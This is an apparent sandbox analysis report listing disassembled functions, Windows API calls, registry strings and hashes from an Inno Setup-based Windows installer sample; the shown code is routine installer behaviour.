call 406ab4 2712->2725 2713->2644 2713->2652 2723->2651 2723->2680 2724->2651 2725->2713 2748 4684a0-4684aa 2725->2748 2734->2705 2740 46868c 2734->2740 2735->2683 2749 46879c-4687bb call 414a3c 2737->2749 2763 468762-468769 2738->2763 2764 46876b-46877a call 414a3c 2738->2764 2746 4685f2-4685f9 2739->2746 2747 4685fb-4685fd 2739->2747 2740->2683 2746->2747 2753 468604-468608 2746->2753 2747->2753 2748->2713 2754 4684ac 2748->2754 2765 4687e5-468808 call 47bb50 call 403450 2749->2765 2766 4687bd-4687e0 call 42a038 call 469984 2749->2766 2753->2662 2753->2663 2754->2713 2763->2764 2769 46877c-46878b call 414a3c 2763->2769 2764->2749 2782 468824-46882d 2765->2782 2783 46880a-468813 2765->2783 2766->2765 2769->2749 2785 468843-468853 call 403494 2782->2785 2786 46882f-468841 call 403684 2782->2786 2783->2782 2784 468815-468822 call 47bcf0 2783->2784 2793 468865-46887c call 414b10 2784->2793 2785->2793 2786->2785 2794 468855-468860 call 403494 2786->2794 2798 4688b2-4688bc call 414a3c 2793->2798 2799 46887e-468885 2793->2799 2794->2793 2805 4688c1-4688e6 call 403400 * 3 2798->2805 2800 468887-468890 2799->2800 2801 468892-46889c call 42b0dc 2799->2801 2800->2801 2803 4688a1-4688b0 call 414a3c 2800->2803 2801->2803 2803->2805
                                                          APIs
                                                            • Part of subcall function 00494DD8: GetWindowRect.USER32(00000000), ref: 00494DEE
                                                          • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 0046759B
                                                            • Part of subcall function 0041D6A8: GetObjectA.GDI32(?,00000018,004675B5), ref: 0041D6D3
                                                            • Part of subcall function 00466FA8: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                            • Part of subcall function 00466FA8: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                            • Part of subcall function 00466FA8: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                            • Part of subcall function 00466968: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467650,00000000,00000000,00000000,0000000C,00000000), ref: 00466980
                                                            • Part of subcall function 0049505C: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495066
                                                            • Part of subcall function 0042ED30: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                            • Part of subcall function 0042ED30: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDBD
                                                            • Part of subcall function 00494D28: 73A1A570.USER32(00000000,?,?,?), ref: 00494D4A
                                                            • Part of subcall function 00494D28: SelectObject.GDI32(?,00000000), ref: 00494D70
                                                            • Part of subcall function 00494D28: 73A1A480.USER32(00000000,?,00494DCE,00494DC7,?,00000000,?,?,?), ref: 00494DC1
                                                            • Part of subcall function 0049504C: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495056
                                                          • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0222EEC8,02230C28,?,?,02230C58,?,?,02230CA8,?), ref: 00468225
                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00468236
                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0046824E
                                                            • Part of subcall function 0042A054: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A06A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                          • String ID: $(Default)$STOPIMAGE
                                                          • API String ID: 3271511185-770201673
                                                          • Opcode ID: 65c14ae30e85822ef60db02fd97b7f4e3efbe6cb128918b96e9feeb284152913
                                                          • Instruction ID: b2f63b4b9f8df581d735fd8ef5c85857eef1c350e3dafc85bc3b179d47d789c4
                                                          • Opcode Fuzzy Hash: 65c14ae30e85822ef60db02fd97b7f4e3efbe6cb128918b96e9feeb284152913
                                                          • Instruction Fuzzy Hash: FCF2D6387005148FCB00EB69D9D5F9973F1BF49304F1582BAE9049B36ADB74AC46CB9A
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474DC9
                                                          • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EA6
                                                          • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNext
                                                          • String ID: unins$unins???.*
                                                          • API String ID: 3541575487-1009660736
                                                          • Opcode ID: 93e32e2715b3a8b7847a0fb832790e1c3976f33889ea765eaf668e4b41fda757
                                                          • Instruction ID: 3bd68598c0aa53c456c144f1316f7d147ab415eaa7c6a73ce12ee5554087e81d
                                                          • Opcode Fuzzy Hash: 93e32e2715b3a8b7847a0fb832790e1c3976f33889ea765eaf668e4b41fda757
                                                          • Instruction Fuzzy Hash: 99316370600118AFCB10EF65C881AEEB7A9EF85314F5084F6E50CA73A2DB389F418F19
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A71
                                                          • GetLastError.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A79
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileFindFirstLast
                                                          • String ID:
                                                          • API String ID: 873889042-0
                                                          • Opcode ID: 7ae0723ade0fcfbd8a40aeca515459a75bb89ca97a3748738d7edfd6ae7cd884
                                                          • Instruction ID: 4713bb530a1d6cf0c1be7e5c5fdd45c253cc675fccbb574d3c3c9d841926f9e3
                                                          • Opcode Fuzzy Hash: 7ae0723ade0fcfbd8a40aeca515459a75bb89ca97a3748738d7edfd6ae7cd884
                                                          • Instruction Fuzzy Hash: 44F0F971A04704AB8B21DFA69D4149EB7ACEB86725B5046BBFC14E3282DAB84E054558
                                                          APIs
                                                          • GetVersion.KERNEL32(000003DB,0046DF9A), ref: 0046DF0E
                                                          • CoCreateInstance.OLE32(00499B84,00000000,00000001,00499B94,?,000003DB,0046DF9A), ref: 0046DF2A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateInstanceVersion
                                                          • String ID:
                                                          • API String ID: 1462612201-0
                                                          • Opcode ID: 5a8033094c1a2ccd5f304b9bf5dd1a9c70433978345ec92e95cfd2b7b8fd1860
                                                          • Instruction ID: 830c4b43a8f201c084d489d1d0538b8be171f1220f730b3634288a605713aaeb
                                                          • Opcode Fuzzy Hash: 5a8033094c1a2ccd5f304b9bf5dd1a9c70433978345ec92e95cfd2b7b8fd1860
                                                          • Instruction Fuzzy Hash: 08F0A031B853009EEB14E7A9DC46B4A37C0BB65328F4000BBF044972D2E3AC8890875F
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                          • Instruction ID: c2e77f62f7768c8d819fe5e4f890f04d0c30465c7a0250885ae4f210fddfc08b
                                                          • Opcode Fuzzy Hash: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                          • Instruction Fuzzy Hash: 9BE0927170021466D311A96A9C86AEAB35C975C314F00427FBA84E73C2EDB89E4146A9
                                                          APIs
                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424149,?,00000000,00424154), ref: 00423BA6
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: NtdllProc_Window
                                                          • String ID:
                                                          • API String ID: 4255912815-0
                                                          • Opcode ID: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                          • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                          • Opcode Fuzzy Hash: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                          • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                          • Instruction ID: 76bfcf8d2b29e22e6d76dcded3dafddf5190573ba102c834aba1eed314c6e9aa
                                                          • Opcode Fuzzy Hash: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                          • Instruction Fuzzy Hash: C9D0C27130460467C700AA68DC825AA358E8B84306F00483E3CC5DA2C3FABDDA485756
                                                          APIs
                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F534
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: NtdllProc_Window
                                                          • String ID:
                                                          • API String ID: 4255912815-0
                                                          • Opcode ID: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                          • Instruction ID: dfc14921be52f7ae21963fbc3fbcd64f7f6a072f88f97ccbdbccca1c2d2fc057
                                                          • Opcode Fuzzy Hash: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                          • Instruction Fuzzy Hash: 9FD09E7220011DBB9B00DE99E840C6B73ADAB88710BD09926F945C7642D634ED9197A5

                                                           Control-flow Graph
                                                           • (graph rendering not recoverable as text; basic blocks of this function span 0046EE78-0046F515, marked Executed / Not Executed in the original graph)
                                                          APIs
                                                            • Part of subcall function 0046EC64: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                            • Part of subcall function 0046ECD4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F352,?,?,00000000,0046F516,?,_is1,?), ref: 0046ECE7
                                                          • RegCloseKey.ADVAPI32(?,0046F51D,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F568,?,?,0049C1D0,00000000), ref: 0046F510
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Value$Close
                                                          • String ID: " /SILENT$5.5.1 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                          • API String ID: 3391052094-213252641
                                                          • Opcode ID: db2c8a7a7111b7a2256de2528cb94e5858c2f33c6448f5c94e9fc589d623ae97
                                                          • Instruction ID: b1500e3f1927c4d0668730226bdd95c12c24136f653289305a03eef3c2fa698f
                                                          • Opcode Fuzzy Hash: db2c8a7a7111b7a2256de2528cb94e5858c2f33c6448f5c94e9fc589d623ae97
                                                          • Instruction Fuzzy Hash: 40125334A001089BDB04EF56E991ADE73F5FB48304F60807BE8506B765EB78BD45CB5A

                                                           Control-flow Graph
                                                           • (graph rendering not recoverable as text; basic blocks of this function span 00491D44-00492238, marked Executed / Not Executed in the original graph)
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,00000000,00492239,?,?,?,?,00000000,00000000,00000000), ref: 00491D84
                                                          • FindWindowA.USER32(00000000,00000000), ref: 00491DB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FindSleepWindow
                                                          • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                          • API String ID: 3078808852-3310373309
                                                          • Opcode ID: 75f42c2bc3d671ddacef7ceddea1dce46e469a81ba41ac7012420b40329701a8
                                                          • Instruction ID: dc8cd37179c6c7efec8ae072485b7dd58185b77a9baa1073e2e80a3326dd0ce5
                                                          • Opcode Fuzzy Hash: 75f42c2bc3d671ddacef7ceddea1dce46e469a81ba41ac7012420b40329701a8
                                                          • Instruction Fuzzy Hash: 6CC19360B043406BDB24BF7E9D4291A59999F98708711897FB846EB38BCE7CDC0E439D

                                                           Control-flow Graph
                                                           • (graph rendering not recoverable as text; basic blocks of this function span 00483038-0048310E, marked Executed / Not Executed in the original graph)
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483049
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483056
                                                          • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483064
                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0048306C
                                                          • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483078
                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483099
                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004830AC
                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 004830B2
                                                          • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004830C9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                          • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                          • API String ID: 2230631259-2623177817
                                                          • Opcode ID: 19051ef92357407474476a60c046aa04f8c513acd1fb492cc3cf86325791a6e5
                                                          • Instruction ID: af3d4bc633e3fac8e2117acd109dd394a62660f1f52edacbaea6f09291502d38
                                                          • Opcode Fuzzy Hash: 19051ef92357407474476a60c046aa04f8c513acd1fb492cc3cf86325791a6e5
                                                          • Instruction Fuzzy Hash: 9211B69010574194DA117B764C5E76F19888B12F1BF140C3BB880662DBEABD8F45CB2F

                                                          Control-flow Graph

                                                          control_flow_graph 1615 468bb0-468be8 call 47bb50 1618 468bee-468bfe call 4788b8 1615->1618 1619 468dca-468de4 call 403420 1615->1619 1624 468c03-468c48 call 4078e4 call 403738 call 42de14 1618->1624 1630 468c4d-468c4f 1624->1630 1631 468c55-468c6a 1630->1631 1632 468dc0-468dc4 1630->1632 1633 468c7f-468c86 1631->1633 1634 468c6c-468c7a call 42dd44 1631->1634 1632->1619 1632->1624 1636 468cb3-468cba 1633->1636 1637 468c88-468caa call 42dd44 call 42dd5c 1633->1637 1634->1633 1639 468d13-468d1a 1636->1639 1640 468cbc-468ce1 call 42dd44 * 2 1636->1640 1637->1636 1656 468cac 1637->1656 1642 468d60-468d67 1639->1642 1643 468d1c-468d2e call 42dd44 1639->1643 1660 468ce3-468cec call 4314f0 1640->1660 1661 468cf1-468d03 call 42dd44 1640->1661 1645 468da2-468db8 RegCloseKey 1642->1645 1646 468d69-468d9d call 42dd44 * 3 1642->1646 1657 468d30-468d39 call 4314f0 1643->1657 1658 468d3e-468d50 call 42dd44 1643->1658 1646->1645 1656->1636 1657->1658 1658->1642 1668 468d52-468d5b call 4314f0 1658->1668 1660->1661 1661->1639 1672 468d05-468d0e call 4314f0 1661->1672 1668->1642 1672->1639
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(?,00468DCA,?,?,00000001,00000000,00000000,00468DE5,?,00000000,00000000,?), ref: 00468DB3
                                                          Strings
                                                          • Inno Setup: User Info: Organization, xrefs: 00468D82
                                                          • Inno Setup: App Path, xrefs: 00468C72
                                                          • Inno Setup: Icon Group, xrefs: 00468C8E
                                                          • Inno Setup: Selected Tasks, xrefs: 00468D1F
                                                          • %s\%s_is1, xrefs: 00468C2D
                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468C0F
                                                          • Inno Setup: User Info: Serial, xrefs: 00468D95
                                                          • Inno Setup: Deselected Tasks, xrefs: 00468D41
                                                          • Inno Setup: User Info: Name, xrefs: 00468D6F
                                                          • Inno Setup: Setup Type, xrefs: 00468CC2
                                                          • Inno Setup: Deselected Components, xrefs: 00468CF4
                                                          • Inno Setup: Selected Components, xrefs: 00468CD2
                                                          • Inno Setup: No Icons, xrefs: 00468C9B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                          • API String ID: 47109696-1093091907
                                                          • Opcode ID: 8db79232fb2f2725b9adfe70d64749861c257aff0263038353b857e31bb30bb7
                                                          • Instruction ID: 9409bd20b999dcc9be58dd01f280802f9f4acbf4d31626fc1b9235e67c3febe1
                                                          • Opcode Fuzzy Hash: 8db79232fb2f2725b9adfe70d64749861c257aff0263038353b857e31bb30bb7
                                                          • Instruction Fuzzy Hash: B451C430A006489BCB11DB65C9917DEB7F5EF98304F50816FE840A7391EB78AE41CB19

                                                          Control-flow Graph

                                                          control_flow_graph 1833 42386c-423876 1834 42399f-4239a3 1833->1834 1835 42387c-42389e call 41f3bc GetClassInfoA 1833->1835 1838 4238a0-4238b7 RegisterClassA 1835->1838 1839 4238cf-4238d8 GetSystemMetrics 1835->1839 1838->1839 1842 4238b9-4238ca call 408cac call 40311c 1838->1842 1840 4238da 1839->1840 1841 4238dd-4238e7 GetSystemMetrics 1839->1841 1840->1841 1843 4238e9 1841->1843 1844 4238ec-423948 call 403738 call 4062e8 call 403400 call 423644 SetWindowLongA 1841->1844 1842->1839 1843->1844 1856 423962-423990 GetSystemMenu DeleteMenu * 2 1844->1856 1857 42394a-42395d call 424170 SendMessageA 1844->1857 1856->1834 1858 423992-42399a DeleteMenu 1856->1858 1857->1856 1858->1834
                                                          APIs
                                                            • Part of subcall function 0041F3BC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                          • GetClassInfoA.USER32(00400000,00423674), ref: 00423897
                                                          • RegisterClassA.USER32(00499630), ref: 004238AF
                                                          • GetSystemMetrics.USER32(00000000), ref: 004238D1
                                                          • GetSystemMetrics.USER32(00000001), ref: 004238E0
                                                          • SetWindowLongA.USER32(00410648,000000FC,00423684), ref: 0042393C
                                                          • SendMessageA.USER32(00410648,00000080,00000001,00000000), ref: 0042395D
                                                          • GetSystemMenu.USER32(00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423968
                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423977
                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00423984
